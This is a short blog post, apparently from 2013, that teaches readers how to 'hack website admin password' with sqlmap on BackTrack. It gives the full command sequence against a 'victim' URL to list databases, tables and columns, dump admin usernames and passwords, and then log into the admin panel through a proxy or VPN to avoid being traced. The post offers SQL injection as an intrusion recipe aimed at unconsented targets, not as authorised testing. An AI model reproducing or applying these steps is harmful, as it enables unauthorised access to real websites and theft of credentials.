Visit our official website APAJR Lab


Tuesday, 26 February 2013

hack website using backtrack sqlmap | .::APAJR::.

| |
Today i will teach you all, how to hack website admin password using back track.



1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminalsql map 1
2. Now find the vulnerable site. (well I already have vulnerable site)
sql map 2
3. Now type this command in the terminal and hit enter.(refer above figure)
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs

4. Now you will get the database name of the website

sql map 3

Well I got the two database aj and information_schema we will select aj database.

5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables



sql map 4

7. Now you will get the tables list which is stored in aj database.
sql map 5



8. Now lets grab the columns from the admin table
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns

sql map 7

Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

Now we got the username and the password of the website !
sql map 9

Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.

0 comments:

Post a Comment

Powered by Blogger.